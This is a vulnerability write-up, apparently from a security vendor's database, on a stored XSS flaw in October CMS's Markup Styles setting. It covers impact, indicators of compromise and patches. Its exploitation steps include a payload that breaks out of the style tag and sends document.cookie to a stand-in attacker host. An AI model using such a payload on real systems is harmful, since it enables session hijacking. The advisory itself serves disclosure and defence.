CVE-2025-61674: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-61674 is a stored cross-site scripting (XSS) vulnerability in October CMS affecting the backend Editor Settings configuration form. A user with the "Global Editor Settings" permission can inject malicious HTML/JavaScript into the Markup Styles stylesheet input at Settings → Editor Settings → Markup Styles, causing arbitrary script execution across backend pages for all users. The vulnerability affects october/system versions ≤3.7.12 and ≥4.0.0, ≤4.0.11, and was disclosed on January 9, 2026. It carries a CVSS v3.1 base score of 6.1 (Moderate) per the GitHub Advisory, though Feedly reports a score of 4.8 (Github Advisory, October Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where the stylesheet input field in the Editor Settings backend form fails to sanitize user-supplied content before rendering it in backend pages. An attacker can craft input that breaks out of the intended <style> context — for example, by closing the style tag and injecting a <script> block — causing the payload to be stored persistently and executed in the browsers of all backend users who load affected pages. Exploitation requires network access to the backend, a valid account with the "Global Editor Settings" permission, and interaction from a victim user (i.e., another backend user loading a page where the injected script renders) (Github Advisory, October Advisory).

Impact

Successful exploitation results in persistent XSS across the October CMS backend interface, affecting all authenticated backend users. Potential consequences include session hijacking (theft of session cookies or tokens), privilege escalation by performing actions in the context of higher-privileged victim sessions (e.g., administrators), and execution of unauthorized actions such as creating rogue admin accounts or exfiltrating sensitive backend data. Availability is not directly impacted, but confidentiality and integrity of backend user sessions are at high risk (Github Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure. The EPSS score is approximately 0.026% (8th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for a privileged backend account with the "Global Editor Settings" permission, limiting the attacker pool to insider threats or compromised privileged accounts (Github Advisory).

Exploitation steps

  1. Obtain privileged access: Acquire a backend account with the "Global Editor Settings" permission, either through legitimate access, credential theft, or social engineering.
  2. Navigate to the vulnerable form: Log into the October CMS backend and navigate to Settings → Editor Settings → Markup Styles.
  3. Inject malicious payload: In the stylesheet input field, enter a crafted payload that breaks out of the <style> context, such as: </style><script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Save the configuration: Submit the form to persist the malicious script in the CMS database.
  5. Wait for victim interaction: When any other backend user loads a page that renders the injected Markup Styles configuration, the script executes in their browser context.
  6. Harvest session data or escalate privileges: Use the executed script to steal session cookies, perform actions as the victim (e.g., create a new admin account), or exfiltrate sensitive backend information (Github Advisory, October Advisory).

Indicators of compromise

  • Logs: Backend access logs showing POST requests to the Editor Settings configuration endpoint (/backend/system/settings/update or similar) from unexpected users or at unusual times; repeated backend page loads by multiple users shortly after a settings change.
  • Database: Unexpected or obfuscated content in the system_settings table (or equivalent) for the editor key, particularly values containing </style>, <script>, or JavaScript event handlers.
  • Network: Outbound requests from backend users' browsers to unknown external domains (e.g., attacker-controlled cookie-harvesting endpoints) visible in proxy or firewall logs.
  • Application Behavior: Backend users reporting unexpected redirects, pop-ups, or browser behavior after logging into the CMS backend (Github Advisory).

Mitigation and workarounds

October CMS has released patched versions 3.7.13 and 4.0.12, which sanitize stylesheet inputs to prevent injection of arbitrary HTML/JavaScript. All users are strongly encouraged to upgrade immediately. As a temporary workaround if upgrading is not immediately possible, restrict the "Global Editor Settings" permission to fully trusted administrators only — note this reduces but does not eliminate risk. No other configuration-based mitigations are available (Github Advisory, October Advisory).

Community reactions

The vulnerability was reported by security researcher Nakkouch Tarek and remediated by October CMS maintainer daftspunk (Sam Georges). The advisory was published on January 9, 2026, and the fix was released promptly. No significant broader media coverage or notable community debate has been identified beyond standard vulnerability database aggregation (Github Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management